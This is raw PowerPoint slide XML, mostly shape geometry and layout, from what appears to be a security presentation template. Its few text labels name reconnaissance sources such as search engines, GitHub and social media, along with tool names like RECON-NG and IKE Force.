                  <a:gd name="T0" fmla="*/ 10 w 285"/>
                  <a:gd name="T1" fmla="*/ 238 h 238"/>
                  <a:gd name="T2" fmla="*/ 0 w 285"/>
                  <a:gd name="T3" fmla="*/ 226 h 238"/>
                  <a:gd name="T4" fmla="*/ 275 w 285"/>
                  <a:gd name="T5" fmla="*/ 0 h 238"/>
                  <a:gd name="T6" fmla="*/ 285 w 285"/>
                  <a:gd name="T7" fmla="*/ 12 h 238"/>
                  <a:gd name="T8" fmla="*/ 10 w 285"/>
                  <a:gd name="T9" fmla="*/ 238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238">
                    <a:moveTo>
                      <a:pt x="10" y="238"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2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29" name="Rectangle 1041"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="12112003" y="2608722"/>
                <a:ext cx="44989" cy="8379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30" name="Freeform 1042"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="11155980" y="2844916"/>
                <a:ext cx="517378" cy="708583"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 171 w 184"/>
                  <a:gd name="T1" fmla="*/ 252 h 252"/>
                  <a:gd name="T2" fmla="*/ 0 w 184"/>
                  <a:gd name="T3" fmla="*/ 9 h 252"/>
                  <a:gd name="T4" fmla="*/ 12 w 184"/>
                  <a:gd name="T5" fmla="*/ 0 h 252"/>
                  <a:gd name="T6" fmla="*/ 184 w 184"/>
                  <a:gd name="T7" fmla="*/ 243 h 252"/>
                  <a:gd name="T8" fmla="*/ 171 w 184"/>
                  <a:gd name="T9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4" h="252">
                    <a:moveTo>
                      <a:pt x="171" y="252"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171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31" name="Freeform 1043"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="10064988" y="3421343"/>
                <a:ext cx="1554945" cy="359915"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 550 w 553"/>
                  <a:gd name="T1" fmla="*/ 128 h 128"/>
                  <a:gd name="T2" fmla="*/ 0 w 553"/>
                  <a:gd name="T3" fmla="*/ 16 h 128"/>
                  <a:gd name="T4" fmla="*/ 3 w 553"/>
                  <a:gd name="T5" fmla="*/ 0 h 128"/>
                  <a:gd name="T6" fmla="*/ 553 w 553"/>
                  <a:gd name="T7" fmla="*/ 113 h 128"/>
                  <a:gd name="T8" fmla="*/ 550 w 553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3" h="128">
                    <a:moveTo>
                      <a:pt x="550" y="128"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="553" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550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9989069" y="2722327"/>
              <a:ext cx="4434264" cy="2072322"/>
              <a:chOff x="9989069" y="1874834"/>
              <a:chExt cx="4434264" cy="2072322"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="Oval 1044"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="12033273" y="2490624"/>
                <a:ext cx="196828" cy="196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44" name="Oval 1045"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="13211433" y="2828044"/>
                <a:ext cx="219324" cy="21651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45" name="Oval 1046"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="13163631" y="1874834"/>
                <a:ext cx="219324" cy="21932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46" name="Oval 1047"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="14263058" y="2780244"/>
                <a:ext cx="160275" cy="157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47" name="Oval 1048"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="11091308" y="2777432"/>
                <a:ext cx="160275" cy="160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48" name="Oval 1049"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="12038896" y="1891704"/>
                <a:ext cx="185582" cy="18558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49" name="Oval 1050"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9989069" y="3348235"/>
                <a:ext cx="160275" cy="157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50" name="Oval 1051"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="13621961" y="3786881"/>
                <a:ext cx="154651" cy="1602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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Oval 1052"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="10267440" y="2217877"/>
                <a:ext cx="157463" cy="15746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08" tIns="22854" rIns="45708" bIns="2285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Regular" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Freeform 1053"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="11392174" y="4147926"/>
              <a:ext cx="1448096" cy="1777081"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 265 w 521"/>
                <a:gd name="T1" fmla="*/ 0 h 638"/>
                <a:gd name="T2" fmla="*/ 54 w 521"/>
                <a:gd name="T3" fmla="*/ 117 h 638"/>
                <a:gd name="T4" fmla="*/ 41 w 521"/>
                <a:gd name="T5" fmla="*/ 251 h 638"/>
                <a:gd name="T6" fmla="*/ 0 w 521"/>
                <a:gd name="T7" fmla="*/ 391 h 638"/>
                <a:gd name="T8" fmla="*/ 48 w 521"/>
                <a:gd name="T9" fmla="*/ 413 h 638"/>
                <a:gd name="T10" fmla="*/ 34 w 521"/>
                <a:gd name="T11" fmla="*/ 444 h 638"/>
                <a:gd name="T12" fmla="*/ 52 w 521"/>
                <a:gd name="T13" fmla="*/ 459 h 638"/>
                <a:gd name="T14" fmla="*/ 37 w 521"/>
                <a:gd name="T15" fmla="*/ 470 h 638"/>
                <a:gd name="T16" fmla="*/ 49 w 521"/>
                <a:gd name="T17" fmla="*/ 507 h 638"/>
                <a:gd name="T18" fmla="*/ 49 w 521"/>
                <a:gd name="T19" fmla="*/ 506 h 638"/>
                <a:gd name="T20" fmla="*/ 74 w 521"/>
                <a:gd name="T21" fmla="*/ 556 h 638"/>
                <a:gd name="T22" fmla="*/ 180 w 521"/>
                <a:gd name="T23" fmla="*/ 544 h 638"/>
                <a:gd name="T24" fmla="*/ 180 w 521"/>
                <a:gd name="T25" fmla="*/ 638 h 638"/>
                <a:gd name="T26" fmla="*/ 423 w 521"/>
                <a:gd name="T27" fmla="*/ 638 h 638"/>
                <a:gd name="T28" fmla="*/ 416 w 521"/>
                <a:gd name="T29" fmla="*/ 504 h 638"/>
                <a:gd name="T30" fmla="*/ 521 w 521"/>
                <a:gd name="T31" fmla="*/ 265 h 638"/>
                <a:gd name="T32" fmla="*/ 265 w 521"/>
                <a:gd name="T33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1" h="638">
                  <a:moveTo>
                    <a:pt x="265" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="0"/>
                    <a:pt x="92" y="39"/>
                    <a:pt x="54" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="149"/>
                    <a:pt x="27" y="237"/>
                    <a:pt x="41" y="251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="281"/>
                    <a:pt x="0" y="345"/>
                    <a:pt x="0" y="391"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="417"/>
                    <a:pt x="37" y="403"/>
                    <a:pt x="48" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="423"/>
                    <a:pt x="34" y="438"/>
                    <a:pt x="34" y="444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="456"/>
                    <a:pt x="45" y="459"/>
                    <a:pt x="52" y="459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="459"/>
                    <a:pt x="37" y="458"/>
                    <a:pt x="37" y="470"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="485"/>
                    <a:pt x="50" y="478"/>
                    <a:pt x="49" y="507"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="506"/>
                    <a:pt x="49" y="506"/>
                    <a:pt x="49" y="506"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="528"/>
                    <a:pt x="46" y="556"/>
                    <a:pt x="74" y="556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="556"/>
                    <a:pt x="148" y="533"/>
                    <a:pt x="180" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="551"/>
                    <a:pt x="196" y="622"/>
                    <a:pt x="180" y="638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="638"/>
                    <a:pt x="423" y="638"/>
                    <a:pt x="423" y="638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="423" y="638"/>
                    <a:pt x="386" y="595"/>
                    <a:pt x="416" y="504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="438" y="437"/>
                    <a:pt x="521" y="448"/>
                    <a:pt x="521" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="521" y="119"/>
                    <a:pt x="422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45708" tIns="22854" rIns="45708" bIns="22854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oboto Regular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8287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F2E07-CB4F-457E-98A9-145BE923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1108"/>
            <a:ext cx="10375814" cy="5499180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="https://docs.google.com/a/secureideas.com/drawings/d/sUlUdcSU2eruzFPIJvo7mFg/image?w=544&amp;h=280&amp;rev=19&amp;ac=1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74503576-5180-470F-9F38-B250494407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2095500"/>
            <a:ext cx="5181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0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2646" y="310793"/>
            <a:ext cx="21178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IKE Force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57250" y="1112521"/>
            <a:ext cx="1129255" cy="59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Roboto Regular" charset="0"/>
            </a:endParaRPr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1588" y="0"/>
            <a:ext cx="12188825" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 19589 w 19590"/>
              <a:gd name="T1" fmla="*/ 11022 h 11023"/>
              <a:gd name="T2" fmla="*/ 0 w 19590"/>
              <a:gd name="T3" fmla="*/ 11022 h 11023"/>
              <a:gd name="T4" fmla="*/ 13947 w 19590"/>
              <a:gd name="T5" fmla="*/ 7539 h 11023"/>
              <a:gd name="T6" fmla="*/ 19589 w 19590"/>
              <a:gd name="T7" fmla="*/ 0 h 11023"/>
              <a:gd name="T8" fmla="*/ 19589 w 19590"/>
              <a:gd name="T9" fmla="*/ 11022 h 1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90" h="11023">
                <a:moveTo>
                  <a:pt x="19589" y="11022"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="11022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13947" y="7539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19589" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19589" y="11022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Roboto Regular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648200" y="1112521"/>
            <a:ext cx="7759700" cy="4894579"/>
            <a:chOff x="5898415" y="1976415"/>
            <a:chExt cx="5654530" cy="3255020"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2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2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3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3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3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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3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id-ID" sz="900">
                <a:latin typeface="Roboto Light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72012" y="4966986"/>
            <a:ext cx="450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Some other shit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2012" y="4496514"/>
            <a:ext cx="13885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Content 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2012" y="2613896"/>
            <a:ext cx="4508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Some shit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2012" y="2143423"/>
            <a:ext cx="13869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Content A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 2645"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950605" y="1502158"/>
            <a:ext cx="742671" cy="54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Regular" charset="0"/>
              <a:ea typeface="Roboto Regular" charset="0"/>
              <a:cs typeface="Roboto Regular" charset="0"/>
              <a:sym typeface="Gill Sans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9F449DB-1543-A547-B62E-27C70B1ED54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7" r="25517"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5666149" y="1442057"/>
            <a:ext cx="5853067" cy="3876564"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 2808">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6695CA7B-8694-0043-A368-FB9CE3DDEFAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905397" y="3687486"/>
            <a:ext cx="787879" cy="809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0000"/>
              </a:solidFill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42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1F2E07-CB4F-457E-98A9-145BE923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81108"/>
            <a:ext cx="10375814" cy="5499180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="https://docs.google.com/a/secureideas.com/drawings/d/sUlUdcSU2eruzFPIJvo7mFg/image?w=544&amp;h=280&amp;rev=19&amp;ac=1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74503576-5180-470F-9F38-B250494407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2095500"/>
            <a:ext cx="5181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65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IMG_4711_rt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2" r="30992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RECON-NG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07744" y="1225054"/>
            <a:ext cx="776519" cy="6398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652" tIns="22827" rIns="45652" bIns="22827" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Open Sans Ligh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124504" y="1802016"/>
            <a:ext cx="2385427" cy="326347"/>
            <a:chOff x="1848067" y="2697524"/>
            <a:chExt cx="2311184" cy="316190"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="Straight Connector 15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099738" y="1424752"/>
            <a:ext cx="2133045" cy="1136713"/>
            <a:chOff x="838200" y="2992185"/>
            <a:chExt cx="1600200" cy="852868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2992185"/>
              <a:ext cx="1600200" cy="25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Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t>Search Engines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latin typeface="Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t>Query indexed pages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018098" y="1376765"/>
            <a:ext cx="2494875" cy="1303733"/>
            <a:chOff x="7528087" y="2680840"/>
            <a:chExt cx="2061939" cy="316190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8401362" y="977735"/>
            <a:ext cx="2133045" cy="1136713"/>
            <a:chOff x="838200" y="2992185"/>
            <a:chExt cx="1600200" cy="852868"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 31"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="2992185"/>
              <a:ext cx="1600200" cy="25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Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t>Open Source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dirty="0">
                  <a:latin typeface="Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t>Searching </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                  <a:latin typeface="Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t>github</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1050" dirty="0">
                  <a:latin typeface="Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t> repositories for information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80967" y="4395816"/>
            <a:ext cx="2462690" cy="326346"/>
            <a:chOff x="1848067" y="2697524"/>
            <a:chExt cx="2311184" cy="316190"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Straight Connector 34"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3661285" y="2697524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1848067" y="2697524"/>
              <a:ext cx="181321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1727348" y="4006933"/>
            <a:ext cx="2133045" cy="1136713"/>
            <a:chOff x="838200" y="2992185"/>
            <a:chExt cx="1600200" cy="852868"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="TextBox 37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="2992185"/>
              <a:ext cx="1600200" cy="25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Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t>Social Media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50" dirty="0">
                  <a:latin typeface="Open Sans Light"/>
                  <a:cs typeface="Open Sans Light"/>
                </a:rPr>
                <a:t>Utilize Social Media pages such as LinkedIn and Twitter</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="AutoShape 96"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1180796" y="4059135"/>
            <a:ext cx="398821" cy="3888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45" y="434"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19000" y="276"/>
                  <a:pt x="19186" y="194"/>
                  <a:pt x="19399" y="194"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19670" y="194"/>
                  <a:pt x="19900" y="332"/>
                  <a:pt x="20087" y="602"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20165" y="716"/>
                  <a:pt x="20282" y="872"/>
                  <a:pt x="20432" y="1072"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20586" y="1274"/>
                  <a:pt x="20733" y="1483"/>
                  <a:pt x="20880" y="1692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21024" y="1903"/>
                  <a:pt x="21147" y="2127"/>
                  <a:pt x="21252" y="2359"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21357" y="2597"/>
                  <a:pt x="21411" y="2796"/>
                  <a:pt x="21411" y="2967"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21411" y="3334"/>
                  <a:pt x="21298" y="3616"/>
                  <a:pt x="21071" y="3825"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2568" y="21376"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2408" y="21526"/>
                  <a:pt x="2227" y="21599"/>
                  <a:pt x="2017" y="21599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1725" y="21599"/>
                  <a:pt x="1495" y="21464"/>
                  <a:pt x="1324" y="21194"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1248" y="21082"/>
                  <a:pt x="1128" y="20924"/>
                  <a:pt x="971" y="20724"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="817" y="20521"/>
                  <a:pt x="668" y="20316"/>
                  <a:pt x="528" y="20104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="386" y="19893"/>
                  <a:pt x="261" y="19672"/>
                  <a:pt x="156" y="19443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="19214"/>
                  <a:pt x="0" y="19008"/>
                  <a:pt x="0" y="18832"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="18465"/>
                  <a:pt x="115" y="18177"/>
                  <a:pt x="337" y="17971"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18845" y="434"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4372" y="9154"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2998" y="8634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4372" y="8126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4805" y="6484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5204" y="8126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6597" y="8634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5204" y="9154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4805" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4372" y="9154"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7126" y="5329"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4372" y="4316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7126" y="3317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7971" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8810" y="3317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11565" y="4316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8810" y="5329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7971" y="8634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7126" y="5329"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12412" y="2670"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11041" y="2162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12412" y="1642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12845" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13278" y="1642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14637" y="2162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13278" y="2670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12845" y="4316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12412" y="2670"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20498" y="2993"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19399" y="1289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15070" y="5385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16172" y="7086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20498" y="2993"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="21599" y="9154"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20229" y="9674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19807" y="11320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19374" y="9674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18001" y="9154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19374" y="8661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19807" y="7004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20229" y="8661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21599" y="91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196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48" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1500536" y="1376765"/>
            <a:ext cx="440465" cy="3214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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21470" y="796"/>
                  <a:pt x="21599" y="1175"/>
                  <a:pt x="21599" y="1615"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21599" y="19984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21599" y="20419"/>
                  <a:pt x="21470" y="20803"/>
                  <a:pt x="21208" y="21121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20946" y="21441"/>
                  <a:pt x="20630" y="21599"/>
                  <a:pt x="20263" y="21599"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1370" y="21599"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1003" y="21599"/>
                  <a:pt x="683" y="21441"/>
                  <a:pt x="411" y="21121"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="137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3" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19805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2162"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5978" y="17886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3598" y="17886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3598" y="12784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5978" y="12784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5978" y="17886"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9961" y="17886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7606" y="17886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6"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14018" y="17886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11638" y="17886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11638" y="9561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14018" y="9561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14018" y="17886"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18001" y="17886"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15621" y="17886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15621" y="4920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18001" y="4920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18001" y="17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196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41" name="Picture 40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BC730ACC-3909-4237-BDAE-CEB704CCA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35" y="0"/>
